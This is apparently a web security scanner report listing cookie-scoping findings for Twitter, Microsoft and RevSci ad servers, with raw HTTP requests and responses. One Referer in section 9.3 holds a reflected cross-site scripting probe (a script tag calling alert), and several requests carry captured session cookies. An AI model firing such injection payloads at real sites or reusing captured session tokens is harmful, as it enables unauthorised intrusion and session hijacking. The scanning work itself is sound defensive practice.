9.2. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?since_id=68453667229020161&include_entities=1&include_available_features=1&contributor_details=true&include_rts=true&user_id=15163484 HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://api.twitter.com/receiver.html
X-Requested-With: XMLHttpRequest
X-Twitter-Polling: true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*; q=0.01
X-Phx: true
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1309445969207029; __utma=43838368.1598605414.1305368954.1308923300.1309960866.11; __utmb=43838368.1.10.1309960866; __utmc=43838368; __utmz=43838368.1309960866.11.4.utmcsr=techflash.com|utmccn=(referral)|utmcmd=referral|utmcct=/about.html; original_referer=JbKFAfGwv4RwApvTLqS%2BuSg2nN6n6Sc2FNg%2B%2FJZdApHOHiilCO8gnQ%3D%3D; guest_id=v1%3A130884465537011414; _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCAzhKP8wAToOcmV0dXJuX3RvIiBodHRwOi8v%250AdHdpdHRlci5jb20vZ3JlZ2xhbW06B2lkIiVkNDQ5NTQwNjk5YTQ4ZDU0NjNl%250AZjhmNDNiYWM3MjQyNToMY3NyZl9pZCIlM2UwN2EzMmM4Zjk4ZGJjYjE0ZTM0%250AYTQ1YzQzMmQzYTUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--f3d4f811a37ea07fd8b37060d2e6643dd71eac68

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:04:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1309961052-4529-6887
X-RateLimit-Limit: 1000
ETag: "9c237181185d2b078bf4fda3390239f0"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Wed, 06 Jul 2011 14:04:12 GMT
X-RateLimit-Remaining: 994
X-Runtime: 0.01930
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114aff9ed0a
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api_phoenix
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 239a05ec8562be929883e9ec9c5449f8d4242a71
X-RateLimit-Reset: 1309964469
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoPY3JlYXRlZF9hdGwrCAzhKP8wAToOcmV0dXJuX3RvIiBodHRwOi8v%250AdHdpdHRlci5jb20vZ3JlZ2xhbW06DGNzcmZfaWQiJTNlMDdhMzJjOGY5OGRi%250AY2IxNGUzNGE0NWM0MzJkM2E1OgdpZCIlZDQ0OTU0MDY5OWE0OGQ1NDYzZWY4%250AZjQzYmFjNzI0MjUiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--25bb772d1d71a9f9c11b1038f0fad6e3f4958060; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 4534
Connection: close

{"statuses":[],"packed_response_type":"statuses","available_features":{"tweet_stream_retweets_by_others":1,"dashboard_activity_listed":1,"phoenix_tweetbox_talon":1,"tweet_stream_favorites_polling":1,"
...[SNIP]...

9.3. http://c.microsoft.com/trans_pixel.aspx

Summary

Severity:   Low
Confidence:   Firm
Host:   http://c.microsoft.com
Path:   /trans_pixel.aspx

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trans_pixel.aspx?tz=-5&ti=Microsoft%20Search%20Preferences%20Page&fi=1&fv=10.3&r=http%3A%2F%2Fburp%2Fshow%2F0&ts=1309951354314&sr=1920x1200&bs=1041x985 HTTP/1.1
Host: c.microsoft.com
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ef1d3c6b4585=1&mkt=en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; mcI=Thu, 09 Jun 2011 16:24:17 GMT; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; msdn=L=1033; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; s_vnum=1311213700142%26vn%3D2; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/21/2011 12:35:21&Microsoft.VisitStartDate=06/21/2011 12:32:03&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=29&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1309940116672:ss=1309940093261

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Microsoft-IIS/7.5
Set-Cookie: MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=c7fac793-ceeb-435f-829d-6351edfd89a3&Microsoft.CreationDate=07/06/2011 11:22:37&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.NumberOfVisits=2&SessionCookie.Id=26FDF2F789E3D4343E8A3F6065EE6BF1; domain=microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
Set-Cookie: MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/06/2011 11:22:38&Microsoft.VisitStartDate=07/06/2011 11:22:37&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=31&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; domain=microsoft.com; expires=Thu, 05-Jul-2012 11:22:38 GMT; path=/
Set-Cookie: MS0=3382a99b723844019751e1a79738c963; domain=.microsoft.com; expires=Wed, 06-Jul-2011 11:52:38 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 11:22:38 GMT
Content-Length: 44

GIF89a........3....!.......,........@...Q.;.

9.4. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K08784 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=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; rtc_Vpu9=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; rsiPus_TE1N="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"; rsi_us_1000000="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"; 
udm_0=MLv3NzUNbjpr3hfhvURQO7bVnc3Latc29T4IRbcs6OIWwxvfrNL/DOg1H1jrVqpsW0lWW4HtqMd7E+Uk5EzwLMOJAF+KNwwvW70D8Wocb+lGcNYP/uVmI8EAnSaGIlLRuAZXx5ZGXJTbr4U67p6Nmptr4BJmF8czLH3P6CzlXoqpP/AqWqHnFiNetqPWOif4QVTii6uy+8fRFg3ceiBW4qlM/6vhrY47MwXPFbPvvHDJ3QtIInpUPLFKnoac2xOWgbaZU82eHi3DdXUTS9R4AV4RQ+dn9HWu9sMszBaK/WByvVshR4FnYfVtmSItAsfgC7n1tO1YdoHGVxupt/38v1DYoEvv8mHa1TNZXOYZ+PKeLqhyRjT5FA3BIAdkEnZeU/b8qRIXTPPZsXfV8y2DtD4UvHS2lhhVN7vY6Ktt8kn5aAEKM/sI99+4Y44sdqDU7C4U3d2buYp9bKOzrlZoJStEZTC9cMt4uOkwOQKq+HClC0YwpnRI+RYgR22ErSsIpamH8gzUv57gNxj4RxN8PSQE2dJBoo3wLtqLVA65yBuEzbCE5YZT2PoTFoYC7HUf+RwSGVqHLBAdy3gFEaxmYdMIaD/cSHi46fXLe8Cjx34VD2Dnbq+YzIx1JE79YKvGlEBJPPViqmJAVNOAwegES9AFZTsC9sJnl5s/497ONiFtBSEmn4BiuHzFLKi7C2XxRiPNqV43M7bWFYQbiYz8xbH7WZmvLZJ+AOlG3Onnnyp7Hun60z6duZ8H5kvJAhtuaeiWvgU9wvTIz3cVEmF3LyEq+82UmG2j5BtliZuLOFroZWYr2zZMhIjh3tRtrXkZ/OHSvr5pIXuALDryFTkD6hX9i3qpwcSXANiyjRhG5XfquJM7S1IVn5j5yMjNLu8F4sYckSt66B8yvYVRw8jGdneM5IbfudUCxODOmpoWr8Su2FC1VWHnp9AytRFYyurTGbz4ynHTH+6VBHucy+1Obxiyw/wr3P5mD7RcgSYmdkF/DP6xl9bfnuCKyKuEbayFkkugKbhXyjbt7s/ytyzvWlHmmdLGhoGSo9lVinKWjCWsFEri5fsT6dXcd3DW7m04GhQ9NEyv8t24u5It+hywVMh407VyvFxLQr57u+hn9oh5ofDZUEap/uQHWjyPmj4S+a8MI2yegIuSq7QdSHIrWfep30rYVOzJZjmGSKAvVDRboKmhRkdEpskBWY7ved+EVqqEWGcOc3C8Kv+hSFOnoB17n/vLB/syQK9dPGy6zteVAjqNB9pn7Bc4o69Bsl+A7aEM9AMHvhrZh1vYWw4MDoaIrA9dGLcL0oOBCKhgwBBud9MOP3gtaQaGIRoXzQV6uVZ2/A+XZpi1BfXB1BE6bMQnAhUUuepfy8RIuUGm6pvdxFeM8KVin+L3pLENGei3NaIGE2iMfLs8jv1fq1D5PwQcvMzZs541ABWbrQzmR0H2EbzvqdGh1bgNAPE0I4vZr+BIi5g1FtdHTv6wcjeLM87cvyYzgIw8R/rOr/b3cB3nexjtIQCAelIlihMTfWysxZ0wWajQI9JioKfrc93VMVDy/O2HDYKbKaIK6Zv0ETyvMG/dbRSDhPM7WaYxo71F/pCWlLROcSUg7tMtcwBVd8Bx+EolOzoSz8hgWe5977t7UZL/iigxbwAOJxt4S7Uw5MX207E1acWpPGo1OQfdvBhY5CXzA+xxh/MdxxFvAM4gGytM60RFkVDlezaEojWN+Xv9Ut+o+3U/QT8IWZfEyFNcQtoftGgpRslxCIHUtS8+Sr4d88ot8mjFZJ+35zhbkq4AIxADxJ1hvDzGng==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_21Ju="MLsXtSMNJjhrJoHUG+rUxPALFPJg7aBDUoXMlOhbzVGnGpP+GQ2GZoeE5gJ1PPpyT8cbdtxkQw36sCSYws02VZnJBV5kVSiK63S0EPqGm20LIDE9g+EqSScZygA5IU5+z66nnzLIa4a+7jtG5zGxdSOV8gUFMvADbUUtaV0aUFiT91q+ex1xkYsKntNNFsTWgrWvRLDQLcNSXvlo3q/KRLeq1Pt82RLf/iCbh+spqJnWAahKpqVwV1XfLfMqHxF1tt52T6X4XQJnlBkHE3Wh9VIiwTsaJC/Aq2Ad3J/wZkceWWAKEdn3cBVIemRNjLVhipHrU63PvzZh1oA2XIbv8Ol1lT1LA5j01RZ5k9XwOnC5XNzrIH1oz0isg0TzZW7wAl7g+OtStP75TuAqIoBh3pzL3nxQppOZbcyJtR8i+nwcV6W1s+9zZ0DRPaAUvy5sWJvgMGsbHK8j9BLddS6cOygwoKDBjGgUkE4h+R8lM2CGp4UoY3LPcymXrjZ7ITdLnOAgrLpNZX7oWm2WLksbc/dPc3bT2Y4F87eu5WmWG9pqQDYBG2hqDGgiWihTYZaXk85vn5wkZECD9XxqHxhGQG8uMFhiHYrV7GUHEGhnycIUcbYVXFWzJw45ZcDaGP53W/7kcSo6QWWOpU8KahGIE1luvVgDDeDprU9mHMUETCH1RKpzeF2tYYoADgWg1mZhWbLysDF30A85/mk/y08a5WXIrHcUO/89jMoeG/MHpq9qi88PH++kpKpgeolkyyCmBNUjSLe6lSf98K1wSSpGYcMKKBm00r2Pa5Ax5XjA1phGc1A2q3WPty6Jc89mIViybtCsaKvucMZ0x+CUSbRyT8Eu3gB2PAGcULlu4qbqfdCM8lJvkO0NcA8ErFngNyabbIW+nngn2CAX4iGqmok7lMQR5WbOF76OYQmgvjyUwTufILzg6XUOwjgbgodQtpc3VOjVC6wKFrq+e1uyFY8XG7R72ASfx61FUCYJunZDMLz7rO5GMQn/HUUZsSij6HWuBbuWoDjZCr+YFL3SrhaoHbdNv0KWOg2DyvNHYG7oEFZ4kNjozYVWp53qst38j0OcJF6lVAmZWVUQzCDjB6FZsXpFA/rNbFXwNlA56k9MCxvwLF2xnb4n2BWu/nIGtet5cYKjqiefRfVhzOI7W+WK6xu4I4g1SldqVcN5+xGhW08iGnmBJQCtMebPuzVs57PnlNG594/4M2ZlaVgiYXVDMqpYntiVuMwLui2KlpyBieSZohEvUpgVIc866H3cPxeiwwWwKR3MyumJg0unOjSFXohJQyZmQfW5dHaNKg8SBtalXffCnIO3VO9/m+epl8h/516tdq80AR8GGHK/oH/uQgYhPup0jy4wQ3x2XxFxVHxWekwsYRFACs4Im8ipdFuKel/fDp4Wcf4/wGHvG38kNUrYRLH/5IUfh1HslclbaPeX+9U/viEhoLftEnD17Dvw0vA4q5yeBDFnd+R6E/nNj1beItLdElbAMusvIEBzs4srCP/lMhCEh1yJFUv+zuqxT43RbuNwJaYnKoQesQHlZB1DDw9lcA+eAhrOGZq2Ouse4JJqWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="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"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Wed, 06 Jul 2011 14:01:05 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

9.5. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=K08784 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_feb9="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"; 
rsi_us_1000000="pUMV4j9DMIYVbY/ikx0KzFTj+FP87ZD9RDcPotrS7irqfu3qY4mFlBU4RjWfnjoBtdFs4WH3fJ6SXFZiS4a53zugCH5h+glQPB4sV4//RPT3TI3QN5T82ZUr/EpqQWf4RdnePtzNmGQEQI1D6tOTkfqk+GqQnQi8ZSCEdHfQHI8jIsrKKzwcxCWHgc0f5DJLLb7IRN11f/w+UvgpQsfP7GxBX1VXNiwtkuax2pbE2sMdZZ6ukKQGGhd6zImH+FwTxfJr3h/d58ejzinjY0Y8cCQnIIheka/NCb0ynwHx2Q9HlUftUEe+G8IP9BX9bwrU8+vYG3rcskqPsdoiTWJHWazmGKOyL+BtLxRTQKcggG6nDSHItI2lS4+kqYzKLIlyDDacwVi1Qz6Ynv1arcp3N4ANE70ZCYzt4MwYKV0nR45LNXVmpHW6j3pTpTB+Up1/bxv9LxVoD3G7J6V29zGBXC+ZYf7+Y+zAy/fmMg454372IY6WkhFI/0egVGf/kYE39SJUM5rTcW0Z7lmVNnaFsF27dHeDaQxXEx/cutg3scRto6ngyjpVnMSGKRvlJ+eu7Zn5V/aSgcXvuALUjSEuR7gssyupFlO0wLxymarhFpMK94VXjj5yaQlJ8MUFlCP/qq/Q1MjKTybRe6jEydbnMGIk5KQ+9EzCv/5AKql/SGwGhvGmK59b8mI0H/s59fcnAaYsTRAh/Gk1GeYHUgEDvSZsuQUTI78KkJXzq/pYbk6qPpLWSRfYlS6a4UnXidqrhhMwnIUtmQk83pnjGzweIe9ifQhl0DW31nUdNKCg3kSOV2LuBbISDzIYDN2z9p906jF1FvxrD2xtzxTas48XslO7BtR/Lkh74WCTKmQ2TcR/80YXAs2x54Unx8/hxsRu+6b2TFgabOY74v0H6PliIbZ+0ydXPZvr6GGWt1iBTOoJfcT7e0r0Qe6ZToij8/lnbZLfV+uEDXOLuOPT+JdyEMvMsEn7HcvBF+lm6kNgTKN2N0+RLO2pzEjlrbHdcho1MyFF9RtXqkWiSYP1SK0Z1JpQawf1VOEyblQFx7TAFSHkDq5YarNx1BjiCNSpT4pkc8zWlMERLAj742CxFJcNA7+7bqXIMpeRazq3GjYvq1ZExQxa14EVX3zMvdLiL4537bQzTtImWwRFCeJp1vOWaNCtiBaCCjUkE2AoeBTuAe4c4yZkwslcIwpVDwPnAc3kKPZLY+Z993KEKoXrWe62waOFdM9UyBhhZ8eyiviPRdWN+n5QWZXB/ytQk/EE16yEod9zUfnImrZJQW9Ys8nMLoze9ggGLSwXkoCVW0jHGRYkBUzEn3w0mptRnwXBbU/Ng4L9wDqPV1VjFlj2eXdfBEd2SWiWEoWV6VePTqpTUUoOMH9nsKTy2BqAdM8+Ek6W3257M/WcT6RgFIYhPu9y3eoJOGdX0ulvPgicSTBr+v6691MMM3Rz/UjOBFtYVx3shMKNlsstRh3vd0jUAyZ6258m9TC3vzg4Mry01nPVr29HB6VUElrRvOKGL8L3qbFAhutUcO/UxXT8a1f+Bhn0sp4SoJzDjEp2cmrA6sxh0SZm33XoaXmH3bmvhnpJX401vQl6DH1RWGWhl6f3idkGtOok/Mk4AKZw1ruTMAbId9Eat5e7LdG4+YIdz+UghA39ntHpNv3FgpMH0DEwDClJszcizVL1xoXNjpyDlYFVaZN8VWoDHe8ueyeVUuvLZwNIkyVi6GZHodr4jdrYvXA+PsERFXEqNg49BAC8jJ6+hf3tGtMtpIavStGyayEm8pmgXnw2/dXLA58vkqaROPe/EhQVfRLBrpPtrP5LkdoyM9GtJD4W6ykqZgFFE6WIfcG3GJ03m55lU7HlWlxuXMSDj9oTnVA9DT33GFTIAc+OmYkGrvWKeQflFuagdRs4X42I5wKzsz9acFXUpmJvMuZy5z5LO2t2s+5TmrnpVq0KmuWhwNOQaYsN+7Romyg47j4n
SP+0fpyhJKll1yPjWD9tHBkY+R0MUxDV9WvcFQ=="; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; rtc_v0Na=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; rsi_segs_1000000=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; rtc_SA26=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; udm_0=MLv3NzMJZjpn3hepL5u85DdJSwnsJulKw7GjhUc66G1t5sARqqsaA7LZsKuuAdTsr767GbQcHDkWCrTmeWLtWp6yJz762TB1UwcjeHZXUyd9djFNJcLio30yxF0HHJw8BhRaZV09XADuFryc7t6F+RKBP1VaY7UwWUB6Hqw/8hvNvCj0P2aI5BUiVaG+ymma61YZrZ6cNi/7+BUP0nU3S/7aDey8pNKbTFe5PtnGelVZx+7RzWne/EK0Hqzvg/cAt24xuyuQiRcU+otjq8L91/vhBet19A0gHxTyU8bHnQxFZQGXBELihm7JUcNFWfDqL5oCOH9CkkBF/VWGyJdwtLmAAMBzOVpAH5rEQxhhn0ldtQhNKu95VbXaqi9Hy7HcpaYFFAG0gZBby/Ino2ND/TX6tyQ5BZVEmjC+vrBUCdi5gDjg8vCrIq6mOhXIxsr1rgP8VqKRS2482lJZLRiYVHVavyAnmm0xR9AiAdeo7Ulq59C1wDZnxwfvLEeBAQQvJD4UAZPMnAWC71qNBnXlSwn6B+iu+W0enrMzUh+pt/42W3ZyHY6wPL0wN55ZpdBoj2pz9x8DZxFJC8/0xAJN9asAv63LYh4pP2tKYCBkV7sKBfAVfyGLdNX/pP4+LEd7PMBqXJitqkzbF9+MLaphweZ3TkcNlE7FaGnjxQPdRypua7cLagU/pdcDVheJzU1Qpv5fnqo9hEcP5pXLebWRI35fOi6VMBuXnQHASM+ZvmIW7roY6dkcDDEPcSnE/eVzUk1c/p+XX0Gk0keWgb40WTFsa/iaQB6LydhfqaYhZGfvb7xoznGXYdL5IifgNcFokjWzep4hkl8kRRTKjBctzuSV0dfTjVJqWlkVn7ojPnTBtr7nvJyfyXssvc/oZPEKn6xtEkyP+huheQDpHwPE81CoOtg/xxDXS0cNluwSTrrZ/tcX/xM4VOQR6XJV7wiNgHj3COP52BgkFWuYCBWpp1Ij5FPQMSbt7pTH2c7UBstZHYsg3GEOgYj0QEAQUa+Gg3z/6YHY+hyOzKt+cCLpId3IuTquVU751kovG4jfZSDMngJEtub6vIo6aw9Ns/MIKRJThup9RJD3VB7EqUTygRfVC30WTM3yC/zCJcQvarkTIoqam+R1D4GnO60sxQIS+e/mX1w/KtPS81kyXN6TiaVQ7uglYyqBXtk/zz0qF6qzFm//Nv417kCWRG0/vOhqEU/d8q3yrAyqHEYTSMmgweeGAIN90FXwo5jDGblHJSyXqxHWV9tUDHtz1PxpJxB1N8GXbFB5TYAQUhQ7vJg7adz9jm8rfw8Y7beMhj+wZIuYSnRxUzpmUnS6ofeg1QUuC+Z3qf9S7L5SQNszvtcoLBc9Ah719T7f1ysEtywa9Vsd4Wwjl8zKCUqlK6pTR5hWwZKA/2vTlMW5KP8nlUJA0ghGLgKo0mw7K7ldIJDGgt35+98A8BFGuHkaYpjyQv6K3yw7I7DTxyaHys5L8nH5kQAKN3bYKYwjlWBp2N1SgUMI3nI+Cog1m4pF8d9z9xmgld2nyHHdFPNPN6cMyv5q95UqaeXKbbMoW1DWCZyaRTxpTpUv59jUkNuIfK24AUjxGeDuhOr8H5iJ6Jed0O3F4r/0YCsGYGJOx3YXtvXWHgws0N2UBQmJKmx
DEOOnMYBplTFEsCuxSiua6b4/y40n8k3S4Svj/LU8Vywx/GY+KvqWkJzzM2QF2z2NaZngQD+ZUuVILb/zzsLyvu+vzkGfYcxC8/Dtr0TTpC57iD72sgltU1Tbp82Kl9OoNo7MKHvxORyvpLnM+wk+V9gxpSUMn3U+jtQ+

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_feb9=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TE1N=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RXmH=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
